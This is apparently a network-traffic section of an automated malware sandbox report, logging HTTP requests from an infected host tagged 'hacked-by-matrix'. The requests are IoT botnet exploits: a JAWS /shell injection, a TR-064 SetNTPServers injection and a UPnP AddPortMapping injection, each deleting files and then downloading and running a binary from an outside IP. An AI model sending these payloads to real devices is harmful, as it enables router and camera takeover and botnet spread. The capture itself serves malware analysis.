                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 30 20 45 52 52 4f 52 3c 2f 48 31 3e 0a 3c 48 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 2e 3c 2f 48 32 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 42 61 64 20 72 65 71 75 65 73 74 2e 0a 57 65 20 63 61 6e 27 74 20 63 6f 6e 6e 65 63 74 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 20 66 6f 72 20 74 68 69 73 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 20 54 68 65 72 65 20 6d 69 67 68 74 20 62 65 20 74 6f 6f 20 6d 75 63 68 20 74 72 61 66 66 69 63 20 6f 72 20 61 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 65 72 72 6f 72 2e 20 54 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2c 20 6f 72 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 6f 77 6e 65 72 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 49 66 20 79 6f 75 20 70 72 6f 76 69 64 65 20 63 6f 6e 74 65 6e 74 20 74 6f 20 63 75 73 74 6f 6d 65 72 73 20 74 68 72 6f 75 67 68 20 43 6c 6f 75 64 46 72 6f 6e 74 2c 20 79 6f 75 20 63 61 6e 20 66 69 6e 64 20 73 74 65 70 73 20 74 6f 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 20 61 6e 64 20 68 65 6c 70 20 70 72 65 76 65 6e 74 20 74 68 69 73 20 65 72 72 6f 72 20 62 79 20 72 65 76 69 65 77 69 6e 67 20 74 68 65 20 43 6c 6f 75 64 46 72 6f 6e 74 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 3c 50 52 45 3e 0a 47 65 6e 65 72 61 74 65 64 20 62 79 20 63 6c 6f 75 64 66 72 6f 6e 74 20 28 43 6c 6f 75 64 46 72 6f 6e 74 29 0a 52 65 71 75 65 73 74 20 49 44 3a 20 4f 47 6e 6f 46 4b 49 4d 44 48 50 73 6f 45 61 65 45 4b 4f 4b 75 47 72 46 56 2d 76 6f 31 36 48 61 6d 49 4e 30 47 4c 56 42 56 55 56 43 45 65 32 46 38 66 69 77 78 41 3d 3d 0a 3c 2f 50 52 45 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"><TITLE>ERROR: The request could not be satisfied</TITLE></HEAD><BODY><H1>400 ERROR</H1><H2>The request could not be satisfied.</H2><HR noshade size="1px">Bad request.We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner.<BR clear="all">If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation.<BR clear="all"><HR noshade size="1px"><PRE>Generated by cloudfront (CloudFront)Request ID: OGnoFKIMDHPsoEaeEKOKuGrFV-vo16HamIN0GLVBVUVCEe2F8fiwxA==</PRE><ADDRESS></ADDRESS></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        829192.168.2.134183639.101.68.21380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.932399988 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:01.804240942 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:02.159790039 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:23:02 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        830192.168.2.1358894109.36.221.1547547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.934515953 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:00.493334055 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:01.580224037 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        831192.168.2.1337918109.36.131.6252869
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.939471960 CET975OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:03.084240913 CET975OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:09.229317904 CET975OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:21.260282040 CET975OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:47.120243073 CET975OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
